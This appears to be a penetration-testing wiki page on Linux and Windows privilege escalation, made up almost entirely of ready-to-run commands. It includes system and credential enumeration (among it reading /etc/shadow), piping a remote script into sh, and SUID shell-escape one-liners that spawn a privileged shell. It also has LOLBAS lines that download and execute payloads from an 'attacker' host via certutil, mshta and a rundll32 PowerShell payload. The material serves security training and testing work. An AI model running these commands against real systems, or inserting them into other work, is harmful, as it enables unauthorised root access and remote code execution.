Privilege Escalation

This page provides an overview of privilege escalation techniques. For detailed platform-specific guides, see:

General Methodology

1. Situational Awareness

# Who am I?
whoami
id
hostname

# What system is this?
uname -a                    # Linux
systeminfo                  # Windows
cat /etc/*release           # Linux distro

# Network information
ip a / ifconfig             # Linux
ipconfig /all               # Windows
netstat -antup              # Linux
netstat -ano                # Windows

2. Users & Groups

# Linux
cat /etc/passwd
cat /etc/group
cat /etc/shadow             # If readable
who
w
last

# Windows
net user
net localgroup
net localgroup Administrators
whoami /priv
whoami /groups

3. Running Processes & Services

# Linux
ps aux
ps -ef
top
cat /etc/services

# Windows
tasklist /v
wmic process list full
sc query
net start

4. Installed Software

# Linux
dpkg -l                     # Debian
rpm -qa                     # RHEL
pip list
which python perl ruby gcc nc wget curl

# Windows
wmic product get name,version
reg query HKLM\SOFTWARE
dir "C:\Program Files"
dir "C:\Program Files (x86)"

5. Scheduled Tasks

# Linux
crontab -l
ls -la /etc/cron*
cat /etc/crontab
systemctl list-timers

# Windows
schtasks /query /fo LIST /v
dir C:\Windows\Tasks

Automated Enumeration Tools

Linux

# LinPEAS - Most comprehensive
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh -t

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

# pspy - Monitor processes
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64 && ./pspy64

Windows

# WinPEAS
# https://github.com/carlospolop/PEASS-ng/releases
.\winPEASany.exe

# PowerUp
# https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
# https://github.com/GhostPack/Seatbelt
.\Seatbelt.exe -group=all

# SharpUp
# https://github.com/GhostPack/SharpUp
.\SharpUp.exe

Common Privilege Escalation Vectors

Linux

Vector

Description

Detection

SUID/SGID

Binaries running with elevated privileges

find / -perm -4000 2>/dev/null

Sudo misconfig

Commands allowed without password

sudo -l

Capabilities

Special kernel privileges

getcap -r / 2>/dev/null

Writable files

Config files, scripts

find / -writable 2>/dev/null

Cron jobs

Scheduled tasks with issues

cat /etc/crontab

Kernel exploits

Unpatched kernel

uname -a

NFS no_root_squash

Mountable shares

cat /etc/exports

Docker group

Container escape

id | grep docker

Windows

Vector

Description

Detection

Unquoted service paths

Service path without quotes

wmic service get name,pathname

Weak service permissions

Modifiable service binaries

accesschk.exe /accepteula -uwcqv *

AlwaysInstallElevated

MSI runs as SYSTEM

Registry check

Stored credentials

Cached passwords

cmdkey /list

DLL hijacking

Missing DLLs in PATH

Process Monitor

Token impersonation

Potato attacks

whoami /priv

Unpatched vulnerabilities

Missing KB

systeminfo

Quick Reference

GTFOBins (Linux)

# https://gtfobins.github.io/
# SUID exploitation examples

# Python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Find
find . -exec /bin/sh -p \; -quit

# Vim
vim -c ':py import os; os.execl("/bin/sh", "sh", "-p")'

# Bash
/bin/bash -p

LOLBAS (Windows)

# https://lolbas-project.github.io/
# Living Off The Land Binaries

# certutil - Download files
certutil -urlcache -f http://attacker/file.exe file.exe

# mshta - Execute HTA
mshta http://attacker/evil.hta

# rundll32 - Execute DLL
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -c IEX(cmd)")

Resources

PreviousFile transfer NextBuffer Overflow

Last updated 8 days ago

Was this helpful?

hashtagGeneral Methodology

hashtag1. Situational Awareness

hashtag2. Users & Groups

hashtag3. Running Processes & Services

hashtag4. Installed Software

hashtag5. Scheduled Tasks

hashtagAutomated Enumeration Tools

hashtagLinux

hashtagWindows

hashtagCommon Privilege Escalation Vectors

hashtagLinux

hashtagWindows

hashtagQuick Reference

hashtagGTFOBins (Linux)

hashtagLOLBAS (Windows)

hashtagResources

General Methodology

1. Situational Awareness

2. Users & Groups

3. Running Processes & Services

4. Installed Software

5. Scheduled Tasks

Automated Enumeration Tools

Linux

Windows

Common Privilege Escalation Vectors

Linux

Windows

Quick Reference

GTFOBins (Linux)

LOLBAS (Windows)

Resources